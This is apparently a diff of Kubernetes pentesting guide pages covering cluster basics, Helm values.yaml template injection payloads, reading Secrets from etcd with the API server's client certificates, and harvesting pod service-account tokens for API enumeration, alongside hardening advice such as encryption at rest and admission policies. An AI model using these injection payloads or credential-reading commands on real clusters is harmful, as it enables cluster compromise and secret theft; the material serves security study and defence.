+    - host: dashboard.com
+      http:
+        paths:
+          - backend:
+              service:
+                name: kubernetes-dashboard
+                port:
+                  number: 80
+            path: /
+            pathType: Prefix
+```
+
 **Example of secrets config file**
 
-Note how the password are encoded in B64 (which isn't secure!)
+Note how the password values are base64-encoded (which is not secure by itself).<sup>[[25]](#references)</sup>
 
 ```yaml
 apiVersion: v1
@@ -276,7 +299,7 @@ data:
 
 **Example of ConfigMap**
 
-A **ConfigMap** is the configuration that is given to the pods so they know how to locate and access other services. In this case, each pod will know that the name `mongodb-service` is the address of a pod that they can communicate with (this pod will be executing a mongodb):
+A **ConfigMap** provides configuration to Pods so they know how to locate and access other Services. In this case, each Pod can use the Service name `mongodb-service` to reach the MongoDB workload:<sup>[[15]](#references)</sup>
 
 ```yaml
 apiVersion: v1
@@ -287,7 +310,7 @@ data:
   database_url: mongodb-service
 ```
 
-Then, inside a **deployment config** this address can be specified in the following way so it's loaded inside the env of the pod:
+Then, inside a **Deployment** configuration, this address can be loaded into a Pod environment variable:<sup>[[15]](#references)</sup>
 
 ```yaml
 [...]
@@ -312,16 +335,16 @@ spec:
 
 **Example of volume config**
 
-You can find different example of storage configuration yaml files in [https://gitlab.com/nanuchi/youtube-tutorial-series/-/tree/master/kubernetes-volumes](https://gitlab.com/nanuchi/youtube-tutorial-series/-/tree/master/kubernetes-volumes).\
-**Note that volumes aren't inside namespaces**
+You can find different examples of storage configuration YAML files in [https://gitlab.com/nanuchi/youtube-tutorial-series/-/tree/master/kubernetes-volumes](https://gitlab.com/nanuchi/youtube-tutorial-series/-/tree/master/kubernetes-volumes).<sup>[[24]](#references)</sup>\
+**Note that volumes aren't inside namespaces**.<sup>[[14]](#references)[[21]](#references)</sup>
 
 ### Namespaces
 
-Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**. These are intended for use in environments with many users spread across multiple teams, or projects. For clusters with a few to tens of users, you should not need to create or think about namespaces at all. You only should start using namespaces to have a better control and organization of each part of the application deployed in kubernetes.
+Kubernetes namespaces isolate groups of resources within the same physical cluster. They are useful in environments with multiple teams or projects. For clusters with only a few users, you may not need to manage namespaces until you need their scoping and organization features.<sup>[[1]](#references)[[21]](#references)</sup>
 
-Namespaces provide a scope for names. Names of resources need to be unique within a namespace, but not across namespaces. Namespaces cannot be nested inside one another and **each** Kubernetes **resource** can only be **in** **one** **namespace**.
+Namespaces provide a scope for names: resource names must be unique within a namespace but not across namespaces, namespaces cannot be nested, and each namespaced resource can be in only one namespace. Cluster-scoped resources such as Nodes and PersistentVolumes are not in a namespace.<sup>[[21]](#references)</sup>
 
-There are 4 namespaces by default if you are using minikube:
+The following four namespaces are present in the example Minikube cluster:
 
 ```
 kubectl get namespace
@@ -332,10 +355,10 @@ kube-public       Active   1d
 kube-system       Active   1d
 ```
 
-- **kube-system**: It's not meant or the users use and you shouldn't touch it. It's for master and kubectl processes.
-- **kube-public**: Publicly accessible date. Contains a configmap which contains cluster information
-- **kube-node-lease**: Determines the availability of a node
-- **default**: The namespace the user will use to create resources
+- **kube-system**: Holds Kubernetes system components and resources; avoid modifying it without a specific administrative reason.<sup>[[1]](#references)[[21]](#references)</sup>
+- **kube-public**: Intended for publicly readable cluster information, including the cluster-info ConfigMap.<sup>[[1]](#references)[[21]](#references)</sup>
+- **kube-node-lease**: Holds node lease objects used to track node availability.<sup>[[1]](#references)[[21]](#references)</sup>
+- **default**: The namespace used when no other namespace is selected.<sup>[[1]](#references)[[21]](#references)</sup>
 
 ```bash
 #Create namespace
@@ -343,7 +366,7 @@ kubectl create namespace my-namespace
 ```
 
 > [!NOTE]
-> Note that most Kubernetes resources (e.g. pods, services, replication controllers, and others) are in some namespaces. However, other resources like namespace resources and low-level resources, such as nodes and persistenVolumes are not in a namespace. To see which Kubernetes resources are and aren’t in a namespace:
+> Note that most Kubernetes resources (e.g. Pods, Services, ReplicaSets, and others) are in a namespace. However, Namespace objects and cluster-scoped resources such as Nodes and PersistentVolumes are not in a namespace. To see which Kubernetes resources are and aren’t in a namespace:<sup>[[21]](#references)</sup>
 >
 > ```bash
 > kubectl api-resources --namespaced=true #In a namespace
@@ -358,17 +381,17 @@ kubectl config set-context --current --namespace=<insert-namespace-name-here>
 
 ### Helm
 
-Helm is the **package manager** for Kubernetes. It allows to package YAML files and distribute them in public and private repositories. These packages are called **Helm Charts**.
+Helm is the **package manager** for Kubernetes. It packages YAML templates and distributes them in public or private repositories as **Helm Charts**.<sup>[[3]](#references)</sup>
 
 ```
 helm search <keyword>
 ```
 
-Helm is also a template engine that allows to generate config files with variables:
+Helm is also a template engine that generates configuration files with variables.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ### Helm `.Values` YAML injection
 
-If a chart inserts **attacker-controlled values** directly into YAML, Helm will **render them as raw YAML content** unless the template explicitly quotes, converts, or validates them. This is especially dangerous in **GitOps** environments (for example with **ArgoCD**) where developers are only allowed to modify `values.yaml` and the chart is assumed to be trusted.
+If a chart inserts **attacker-controlled values** directly into YAML, Helm renders them as **raw YAML content** unless the template quotes, converts, or validates them. This is especially dangerous in **GitOps** environments such as **ArgoCD** where developers may be allowed to modify only `values.yaml` while the chart is trusted.<sup>[[3]](#references)[[4]](#references)[[7]](#references)</sup>
 
 **Typical vulnerable patterns:**
 
@@ -379,7 +402,7 @@ spec:
 image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}"
 ```
 
-If an attacker can control those values, they can abuse YAML multiline scalars (`|` or `|-`) to **break the expected context**, inject **new fields** at the right indentation level, and even inject **new YAML documents** with `---`.
+If an attacker can control those values, they can abuse YAML multiline scalars (`|` or `|-`) to **break the expected context**, inject **new fields** at the right indentation level, and even inject **new YAML documents** with `---`.<sup>[[3]](#references)</sup>
 
 ### Exploitation ideas
 
@@ -391,7 +414,7 @@ replicaCount: |
     injectedAttribute: true
 ```
 
-This can transform a numeric-looking field into additional manifest attributes.
+This can transform a numeric-looking field into additional manifest attributes.<sup>[[3]](#references)</sup>
 
 - **Quoted-context breakout** to inject container attributes such as `command`, `args`, or `securityContext`:
 
@@ -405,16 +428,18 @@ image:
               args: ["id"]
 ```
 
-- **Arbitrary object injection** by creating extra YAML documents with `---`, which may create resources such as `Namespace`, `Pod`, `Role`, `ClusterRole`, `RoleBinding`, or `ClusterRoleBinding` if the Helm/ArgoCD service account is allowed to create them. This connects directly with [RBAC abuse](kubernetes-role-based-access-control-rbac.md), [abusing dangerous roles](abusing-roles-clusterroles-in-kubernetes/), and [namespace pivoting](kubernetes-namespace-escalation.md).
+This works by closing the surrounding scalar/string context and restoring valid indentation around the injected fields.<sup>[[3]](#references)</sup>
+
+- **Arbitrary object injection** by creating extra YAML documents with `---`, which may create resources such as `Namespace`, `Pod`, `Role`, `ClusterRole`, `RoleBinding`, or `ClusterRoleBinding` if the Helm/ArgoCD service account is allowed to create them. This connects directly with [RBAC abuse](kubernetes-role-based-access-control-rbac.md), [abusing dangerous roles](abusing-roles-clusterroles-in-kubernetes/), and [namespace pivoting](kubernetes-namespace-escalation.md).<sup>[[3]](#references)[[6]](#references)[[7]](#references)</sup>
 
 > [!WARNING]
-> Control over `values.yaml` in a vulnerable chart can become **arbitrary workload creation**, **command execution inside Pods**, **privileged Pod deployment**, and sometimes **cluster compromise**.
+> Control over `values.yaml` in a vulnerable chart can become **arbitrary workload creation**, **command execution inside Pods**, **privileged Pod deployment**, and sometimes **cluster compromise**.<sup>[[3]](#references)</sup>
 
 ### Helm v3 vs Helm v4
 
 - **Helm v3** may accept injected unknown fields as long as the final rendered output is valid YAML.
 - **Helm v4** uses **Server-Side Apply** by default and rejects several invalid fields against the Kubernetes schema.
-- However, **Helm v4 does not fully solve the problem**: an attacker may still inject **valid resources first** and append a final invalid object only to absorb the broken context, so previously injected valid resources are still created.
+- However, **Helm v4 does not fully solve the problem**: an attacker may still inject **valid resources first** and append a final invalid object only to absorb the broken context, so previously injected valid resources are still created.<sup>[[3]](#references)</sup>
 
 ### Defensive patterns
 
@@ -430,14 +455,14 @@ replicas: {{ .Values.replicaCount | int }}
 
 Additional hardening:
 
-- Use `values.schema.json` to enforce **types**, **required keys**, and **regex patterns** during `helm template`, `helm install`, `helm upgrade`, and `helm lint`.
-- In **ArgoCD**, restrict the kinds an application can create via `AppProject` rules such as `clusterResourceWhitelist`, and prefer **namespace-scoped** ArgoCD permissions whenever possible.
-- Use **ValidatingAdmissionPolicy** / **ValidatingAdmissionPolicyBinding**, Kyverno, or Gatekeeper rules to block dangerous outputs such as **privileged Pods** even if rendering was compromised.
-- If a target namespace is protected by Pod Security controls, check whether the attacker can inject a **new namespace** where those controls do not apply, then use the new workload for [pod escape](abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) or further [post-compromise attacks from inside a pod](attacking-kubernetes-from-inside-a-pod.md).
+- Use `values.schema.json` to enforce **types**, **required keys**, and **regex patterns** during `helm template`, `helm install`, `helm upgrade`, and `helm lint`.<sup>[[3]](#references)[[5]](#references)</sup>
+- In **ArgoCD**, restrict the kinds an application can create via `AppProject` rules such as `clusterResourceWhitelist`, and prefer **namespace-scoped** ArgoCD permissions whenever possible.<sup>[[3]](#references)[[6]](#references)[[7]](#references)</sup>
+- Use **ValidatingAdmissionPolicy** / **ValidatingAdmissionPolicyBinding**, Kyverno, or Gatekeeper rules to block dangerous outputs such as **privileged Pods** even if rendering was compromised.<sup>[[3]](#references)[[8]](#references)</sup>
+- If a target namespace is protected by Pod Security controls, check whether the attacker can inject a **new namespace** where those controls do not apply, then use the new workload for [pod escape](abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) or further [post-compromise attacks from inside a pod](attacking-kubernetes-from-inside-a-pod.md).<sup>[[3]](#references)</sup>
 
 ## Kubernetes secrets
 
-A **Secret** is an object that **contains sensitive data** such as a password, a token or a key. Such information might otherwise be put in a Pod specification or in an image. Users can create Secrets and the system also creates Secrets. The name of a Secret object must be a valid **DNS subdomain name**. Read here [the official documentation](https://kubernetes.io/docs/concepts/configuration/secret/).
+A **Secret** is an object that **contains sensitive data** such as a password, a token or a key. Such information might otherwise be put in a Pod specification or in an image. Users can create Secrets and the system also creates Secrets. The name of a Secret object must be a valid **DNS subdomain name**. Read here [the official documentation](https://kubernetes.io/docs/concepts/configuration/secret/).<sup>[[25]](#references)</sup>
 
 Secrets might be things like:
 
@@ -465,9 +490,9 @@ There are different types of secrets in Kubernetes
 
 **How secrets works:**
 
-![Kubernetes secrets diagram showing secret data reaching the API server and being consumed by a pod](https://sickrov.github.io/media/Screenshot-164.jpg)
+![Kubernetes secrets diagram showing secret data reaching the API server and being consumed by a pod](https://sickrov.github.io/media/Screenshot-164.jpg)<sup>[[1]](#references)</sup>
 
-The following configuration file defines a **secret** called `mysecret` with 2 key-value pairs `username: YWRtaW4=` and `password: MWYyZDFlMmU2N2Rm`. It also defines a **pod** called `secretpod` that will have the `username` and `password` defined in `mysecret` exposed in the **environment variables** `SECRET_USERNAME` \_\_ and \_\_ `SECRET_PASSWOR`. It will also **mount** the `username` secret inside `mysecret` in the path `/etc/foo/my-group/my-username` with `0640` permissions.
+The following configuration file defines a **Secret** called `mysecret` with two key-value pairs, `username: YWRtaW4=` and `password: MWYyZDFlMmU2N2Rm`. It also defines a **Pod** called `secretpod` that exposes those keys as the environment variables `SECRET_USERNAME` and `SECRET_PASSWORD`, and **mounts** the `username` key at `/etc/foo/my-group/my-username` with `0640` permissions.<sup>[[1]](#references)[[25]](#references)</sup>
 
 ```yaml:secretpod.yaml
 apiVersion: v1
@@ -521,13 +546,13 @@ env | grep SECRET && cat /etc/foo/my-group/my-username && echo
 
 ### Secrets in etcd <a href="#discover-secrets-in-etcd" id="discover-secrets-in-etcd"></a>
 
-**etcd** is a consistent and highly-available **key-value store** used as Kubernetes backing store for all cluster data. Let’s access to the secrets stored in etcd:
+**etcd** is a consistent and highly available **key-value store** used by Kubernetes as the backing store for API data. Accessing Secrets directly in etcd requires privileged access to the control plane and the relevant client certificates.<sup>[[1]](#references)[[11]](#references)[[25]](#references)</sup>
 
 ```bash
 cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep etcd
 ```
 
-You will see certs, keys and url’s were are located in the FS. Once you get it, you would be able to connect to etcd.
+The manifest may show the certificate, key, and endpoint paths used by the API server to connect to etcd. With authorized access, those values can be used to connect to the etcd endpoint.
 
 ```bash
 #ETCDCTL_API=3 etcdctl --cert <path to client.crt> --key <path to client.ket> --cacert <path to CA.cert> endpoint=[<ip:port>] health
@@ -535,7 +560,7 @@ You will see certs, keys and url’s were are located in the FS. Once you get it
 ETCDCTL_API=3 etcdctl --cert /etc/kubernetes/pki/apiserver-etcd-client.crt --key /etc/kubernetes/pki/apiserver-etcd-client.key --cacert /etc/kubernetes/pki/etcd/etcd/ca.cert endpoint=[127.0.0.1:1234] health
 ```
 
-Once you achieve establish communication you would be able to get the secrets:
+Once communication is established, an authorized operator can read the Secret key path:
 
 ```bash
 #ETCDCTL_API=3 etcdctl --cert <path to client.crt> --key <path to client.ket> --cacert <path to CA.cert> endpoint=[<ip:port>] get <path/to/secret>
@@ -543,9 +568,18 @@ Once you achieve establish communication you would be able to get the secrets:
 ETCDCTL_API=3 etcdctl --cert /etc/kubernetes/pki/apiserver-etcd-client.crt --key /etc/kubernetes/pki/apiserver-etcd-client.key --cacert /etc/kubernetes/pki/etcd/etcd/ca.cert endpoint=[127.0.0.1:1234] get /registry/secrets/default/secret_02
 ```
 
+**Additional current `etcdctl` syntax:**
+
+For recent `etcdctl` builds, the same operations can be run with `--endpoints` and explicit certificate flags.<sup>[[28]](#references)</sup>
+
+```bash
+ETCDCTL_API=3 etcdctl --endpoints=https://127.0.0.1:2379 --cert=/etc/kubernetes/pki/apiserver-etcd-client.crt --key=/etc/kubernetes/pki/apiserver-etcd-client.key --cacert=/etc/kubernetes/pki/etcd/ca.crt endpoint health
+ETCDCTL_API=3 etcdctl --endpoints=https://127.0.0.1:2379 --cert=/etc/kubernetes/pki/apiserver-etcd-client.crt --key=/etc/kubernetes/pki/apiserver-etcd-client.key --cacert=/etc/kubernetes/pki/etcd/ca.crt get /registry/secrets/default/secret_02
+```
+
 **Adding encryption to the ETCD**
 
-By default all the secrets are **stored in plain** text inside etcd unless you apply an encryption layer. The following example is based on [https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/](https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/)
+By default, Secrets are **stored as plaintext** in etcd unless you configure encryption at rest. The following example is based on [the Kubernetes encryption-at-rest documentation](https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/).<sup>[[28]](#references)</sup>
 
 ```yaml:encryption.yaml
 apiVersion: apiserver.config.k8s.io/v1
@@ -561,13 +595,27 @@ resources:
       - identity: {}
 ```
 
-After that, you need to set the `--encryption-provider-config` flag on the `kube-apiserver` to point to the location of the created config file. You can modify `/etc/kubernetes/manifest/kube-apiserver.yaml` and add the following lines:
+> [!WARNING]
+> The key in this example is illustrative. Generate a strong key, protect the encryption configuration on every control-plane host, and keep a secure backup.<sup>[[28]](#references)</sup>
+
+After that, set the `--encryption-provider-config` flag on the `kube-apiserver` to point to the created configuration file. On a static-Pod control plane, you can modify `/etc/kubernetes/manifests/kube-apiserver.yaml` and add:
 
 ```yaml
 containers:
   - command:
       - kube-apiserver
       - --encriyption-provider-config=/etc/kubernetes/etcd/<configFile.yaml>
+```
+
+**Additional current `kube-apiserver` flag example:**
+
+Use the correctly spelled flag when configuring a current cluster.<sup>[[28]](#references)</sup>
+
+```yaml
+containers:
+  - command:
+      - kube-apiserver
+      - --encryption-provider-config=/etc/kubernetes/etcd/<configFile.yaml>
 ```
 
 Scroll down in the volumeMounts:
@@ -589,7 +637,7 @@ Scroll down in the volumeMounts to hostPath:
 
 **Verifying that data is encrypted**
 
-Data is encrypted when written to etcd. After restarting your `kube-apiserver`, any newly created or updated secret should be encrypted when stored. To check, you can use the `etcdctl` command line program to retrieve the contents of your secret.
+Data is encrypted when written to etcd. After restarting the `kube-apiserver`, newly created or updated Secrets should be encrypted when stored. To check, use `etcdctl` to retrieve the Secret data.<sup>[[28]](#references)</sup>
 
 1.  Create a new secret called `secret1` in the `default` namespace:
 
@@ -603,16 +651,24 @@ Data is encrypted when written to etcd. After restarting your `kube-apiserver`, 
 
     where `[...]` must be the additional arguments for connecting to the etcd server.
 
-3.  Verify the stored secret is prefixed with `k8s:enc:aescbc:v1:` which indicates the `aescbc` provider has encrypted the resulting data.
+3.  Verify the stored Secret is prefixed with `k8s:enc:aescbc:v1:`, which indicates that the `aescbc` provider encrypted it.<sup>[[28]](#references)</sup>
 4.  Verify the secret is correctly decrypted when retrieved via the API:
 
     ```
     kubectl describe secret secret1 -n default
     ```
 
-    should match `mykey: bXlkYXRh`, mydata is encoded, check [decoding a secret](https://kubernetes.io/docs/concepts/configuration/secret#decoding-a-secret) to completely decode the secret.
+    should match `mykey: bXlkYXRh`, mydata is encoded, check [decoding a secret](https://kubernetes.io/docs/concepts/configuration/secret#decoding-a-secret) to completely decode the secret.<sup>[[26]](#references)[[28]](#references)</sup>
 
-**Since secrets are encrypted on write, performing an update on a secret will encrypt that content:**
+    **Additional API verification example:** To inspect the same value in the full Secret manifest, use:
+
+    ```
+    kubectl get secret secret1 -n default -o yaml
+    ```
+
+**Since Secrets are encrypted on write, updating a Secret will encrypt that content:**<sup>[[28]](#references)</sup>
+
+Run this as an administrator that can read and write all Secrets.<sup>[[28]](#references)</sup>
 
 ```
 kubectl get secrets --all-namespaces -o json | kubectl replace -f -
@@ -620,28 +676,42 @@ kubectl get secrets --all-namespaces -o json | kubectl replace -f -
 
 **Final tips:**
 
-- Try not to keep secrets in the FS, get them from other places.
-- Check out [https://www.vaultproject.io/](https://www.vaultproject.io) for add more protection to your secrets.
-- [https://kubernetes.io/docs/concepts/configuration/secret/#risks](https://kubernetes.io/docs/concepts/configuration/secret/#risks)
+- Try not to keep Secrets in the filesystem; retrieve them from an external secret store when appropriate.<sup>[[25]](#references)</sup>
+- Check out [https://www.vaultproject.io/](https://www.vaultproject.io) for add more protection to your secrets.<sup>[[29]](#references)</sup>
+- Check out [HashiCorp Vault](https://www.vaultproject.io) for additional protection for your Secrets.<sup>[[29]](#references)</sup>
+- [Kubernetes Secret risks](https://kubernetes.io/docs/concepts/configuration/secret/#risks)<sup>[[27]](#references)</sup>
 - [https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes_deployApplicationsConjur-k8s-Secrets.htm](https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes_deployApplicationsConjur-k8s-Secrets.htm)
 
 ## References
 
-{{#ref}}
-https://sickrov.github.io/
-{{#endref}}
-
-{{#ref}}
-https://www.youtube.com/watch?v=X48VuDVv0do
-{{#endref}}
-
-- [Charting your way in: Helm template injection](https://synacktiv.com/en/publications/charting-your-way-in-helm-template-injection.html)
-- [Helm template functions and pipelines](https://helm.sh/docs/chart_template_guide/functions_and_pipelines/)
-- [Helm chart schema files (`values.schema.json`)](https://helm.sh/docs/topics/charts/#schema-files)
-- [Argo CD projects (`AppProject` restrictions)](https://argo-cd.readthedocs.io/en/latest/user-guide/projects/)
-- [Argo CD multiple sources / external Helm value files](https://argo-cd.readthedocs.io/en/latest/user-guide/multiple_sources/#helm-value-files-from-external-git-repository)
-- [Kubernetes ValidatingAdmissionPolicy](https://kubernetes.io/docs/reference/access-authn-authz/validating-admission-policy/)
-- [https://kubernetes.io/docs/concepts/storage/volumes/#image](https://kubernetes.io/docs/concepts/storage/volumes/#image)
-- [https://kubernetes.io/docs/tasks/configure-pod-container/image-volumes/](https://kubernetes.io/docs/tasks/configure-pod-container/image-volumes/)
+- [1] [kubesectips v1](https://sickrov.github.io/)
+- [2] [Kubernetes Tutorial for Beginners (Full Course)](https://www.youtube.com/watch?v=X48VuDVv0do)
+- [3] [Charting your way in: Helm template injection](https://synacktiv.com/en/publications/charting-your-way-in-helm-template-injection.html)
+- [4] [Helm template functions and pipelines](https://helm.sh/docs/chart_template_guide/functions_and_pipelines/)
+- [5] [Helm chart schema files (`values.schema.json`)](https://helm.sh/docs/topics/charts/#schema-files)
+- [6] [Argo CD projects (`AppProject` restrictions)](https://argo-cd.readthedocs.io/en/latest/user-guide/projects/)
+- [7] [Argo CD multiple sources / external Helm value files](https://argo-cd.readthedocs.io/en/latest/user-guide/multiple_sources/#helm-value-files-from-external-git-repository)
+- [8] [Kubernetes ValidatingAdmissionPolicy](https://kubernetes.io/docs/reference/access-authn-authz/validating-admission-policy/)
+- [9] [Kubernetes image volumes](https://kubernetes.io/docs/concepts/storage/volumes/#image)
+- [10] [Use an image volume with a Pod](https://kubernetes.io/docs/tasks/configure-pod-container/image-volumes/)
+- [11] [Kubernetes Components](https://kubernetes.io/docs/concepts/overview/components/)
+- [12] [Pods](https://kubernetes.io/docs/concepts/workloads/pods/)
+- [13] [Service](https://kubernetes.io/docs/concepts/services-networking/service/)
+- [14] [Volumes](https://kubernetes.io/docs/concepts/storage/volumes/)
+- [15] [ConfigMaps](https://kubernetes.io/docs/concepts/configuration/configmap/)
+- [16] [Deployments](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/)
+- [17] [StatefulSets](https://kubernetes.io/docs/concepts/workloads/controllers/statefulset/)
+- [18] [Ingress](https://kubernetes.io/docs/concepts/services-networking/ingress/)
+- [19] [PKI certificates and requirements](https://kubernetes.io/docs/setup/best-practices/certificates/)
+- [20] [Command line tool (`kubectl`)](https://kubernetes.io/docs/reference/kubectl/)
+- [21] [minikube start](https://minikube.sigs.k8s.io/docs/start/)
+- [22] [minikube dashboard](https://minikube.sigs.k8s.io/docs/commands/dashboard/)
+- [23] [Deployment and Service example](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml)
+- [24] [Kubernetes volumes examples](https://gitlab.com/nanuchi/youtube-tutorial-series/-/tree/master/kubernetes-volumes)
+- [25] [Secrets | Kubernetes](https://kubernetes.io/docs/concepts/configuration/secret/)
+- [26] [Decoding a Secret | Kubernetes](https://kubernetes.io/docs/concepts/configuration/secret#decoding-a-secret)
+- [27] [Secret risks | Kubernetes](https://kubernetes.io/docs/concepts/configuration/secret/#risks)
+- [28] [Encrypting Confidential Data at Rest | Kubernetes](https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/)
+- [29] [HashiCorp Vault](https://www.vaultproject.io)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
@@ -4,9 +4,9 @@
 
 ## Kubernetes Tokens
 
-If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the **env var `KUBECONFIG`** or **inside `~/.kube`**.
+If you have compromised access to a machine the user may have access to some Kubernetes platform. A token or kubeconfig is usually located in a file named by the **env var `KUBECONFIG`** or **inside `~/.kube`**. <sup>[[5]](#references)</sup>
 
-In this folder you might find config files with **tokens and configurations to connect to the API server**. In this folder you can also find a cache folder with information previously retrieved.
+In this folder you might find config files with **tokens and configurations to connect to the API server**. In this folder you can also find a cache folder with information previously retrieved. <sup>[[5]](#references)</sup>
 
 If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8 env:
 
@@ -17,11 +17,12 @@ Before continuing, if you don't know what is a service in Kubernetes I would sug
 Taken from the Kubernetes [documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server):
 
 _“When you create a pod, if you do not specify a service account, it is automatically assigned the_ default _service account in the same namespace.”_
+<sup>[[2]](#references)</sup>
 
 **ServiceAccount** is an object managed by Kubernetes and used to provide an identity for processes that run in a pod.\
-Every service account has a secret related to it and this secret contains a bearer token. This is a JSON Web Token (JWT), a method for representing claims securely between two parties.
+Pods normally receive a short-lived, rotating ServiceAccount token through a projected volume. Older clusters and explicitly created legacy token Secrets may instead expose a Secret containing a bearer token. This is a JSON Web Token (JWT), a method for representing claims securely between two parties. <sup>[[3]](#references)</sup>
 
-Usually **one** of the directories:
+A Pod's projected service-account volume is usually in **one** of the directories:
 
 - `/run/secrets/kubernetes.io/serviceaccount`
 - `/var/run/secrets/kubernetes.io/serviceaccount`
@@ -32,10 +33,13 @@ contain the files:
 - **ca.crt**: It's the ca certificate to check kubernetes communications
 - **namespace**: It indicates the current namespace
 - **token**: It contains the **service token** of the current pod.
+<sup>[[3]](#references)[[4]](#references)</sup>
 
-Now that you have the token, you can find the API server inside the environment variable **`KUBECONFIG`**. For more info run `(env | set) | grep -i "kuber|kube`**`"`**
+Now that you have the token, locate the API server using **`KUBERNETES_SERVICE_HOST`** and **`KUBERNETES_SERVICE_PORT_HTTPS`** from inside a Pod, or from a discovered kubeconfig. For more info run `(env | set) | grep -i "kuber|kube"`.
+<sup>[[4]](#references)[[5]](#references)</sup>
 
-The service account token is being signed by the key residing in the file **sa.key** and validated by **sa.pub**.
+The service account token is signed by the key in **sa.key** and validated by **sa.pub**. A common Kubernetes PKI location for these files is:
+<sup>[[6]](#references)</sup>
 
 Default location on **Kubernetes**:
 
@@ -47,7 +51,7 @@ Default location on **Minikube**:
 
 ### Hot Pods
 
-_**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc.
+_**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc. <sup>[[1]](#references)</sup>
 
 ## RBAC
 
@@ -55,20 +59,20 @@ If you don't know what is **RBAC**, **read this section**.
 
 ## GUI Applications
 
-- **k9s**: A GUI that enumerates a kubernetes cluster from the terminal. Check the commands in[https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). Write `:namespace` and select all to then search resources in all the namespaces.
-- **k8slens**: It offers some free trial days: [https://k8slens.dev/](https://k8slens.dev/)
+- **k9s**: A GUI that enumerates a kubernetes cluster from the terminal. Check the commands in[https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). <sup>[[7]](#references)</sup> Write `:namespace` and select all to then search resources in all the namespaces.
+- **k8slens**: It offers some free trial days: [https://k8slens.dev/](https://k8slens.dev/) <sup>[[8]](#references)</sup>
 
 ## Enumeration CheatSheet
 
 In order to enumerate a K8s environment you need a couple of this:
 
 - A **valid authentication token**. In the previous section we saw where to search for a user token and for a service account token.
-- The **address (**_**https://host:port**_**) of the Kubernetes API**. This can be usually found in the environment variables and/or in the kube config file.
+- The **address (**_**https://host:port**_**) of the Kubernetes API**. This can be usually found in the environment variables and/or in the kube config file. <sup>[[4]](#references)[[5]](#references)</sup>
 - **Optional**: The **ca.crt to verify the API server**. This can be found in the same places the token can be found. This is useful to verify the API server certificate, but using `--insecure-skip-tls-verify` with `kubectl` or `-k` with `curl` you won't need this.
 
 With those details you can **enumerate kubernetes**. If the **API** for some reason is **accessible** through the **Internet**, you can just download that info and enumerate the platform from your host.
 
-However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server.
+However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server. <sup>[[9]](#references)</sup>
 
 ### Differences between `list` and `get` verbs
 
@@ -97,14 +101,14 @@ GET /apis/apps/v1/watch/namespaces/{namespace}/deployments  [DEPRECATED]
 GET /apis/apps/v1/watch/deployments  [DEPRECATED]
 ```
 
-They open a streaming connection that returns you the full manifest of a Deployment whenever it changes (or when a new one is created).
+They open a streaming connection that returns you the full manifest of a Deployment whenever it changes (or when a new one is created). <sup>[[11]](#references)</sup>
 
 > [!CAUTION]
 > The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
 
 ### Using curl
 
-From inside a pod you can use several env variables:
+From inside a pod you can use several env variables exposed for in-cluster API access: <sup>[[4]](#references)</sup>
 
 ```bash
 export APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}
@@ -117,7 +121,7 @@ alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
 ```
 
 > [!WARNING]
-> By default the pod can **access** the **kube-api server** in the domain name **`kubernetes.default.svc`** and you can see the kube network in **`/etc/resolv.config`** as here you will find the address of the kubernetes DNS server (the ".1" of the same range is the kube-api endpoint).
+> By default the pod can **access** the **kube-api server** in the domain name **`kubernetes.default.svc`** and you can see the kube network in **`/etc/resolv.config`** as here you will find the address of the kubernetes DNS server (the ".1" of the same range is the kube-api endpoint). <sup>[[4]](#references)</sup>
 
 ### Using kubectl
 
@@ -131,7 +135,7 @@ alias k='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-
 
 > if no `https://` in url, you may get Error Like Bad Request.
 
-You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). The goal of the following sections is to present in ordered manner different options to enumerate and understand the new K8s you have obtained access to.
+You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). <sup>[[10]](#references)</sup> The goal of the following sections is to present in ordered manner different options to enumerate and understand the new K8s you have obtained access to.
 
 To find the HTTP request that `kubectl` sends you can use the parameter `-v=8`
 
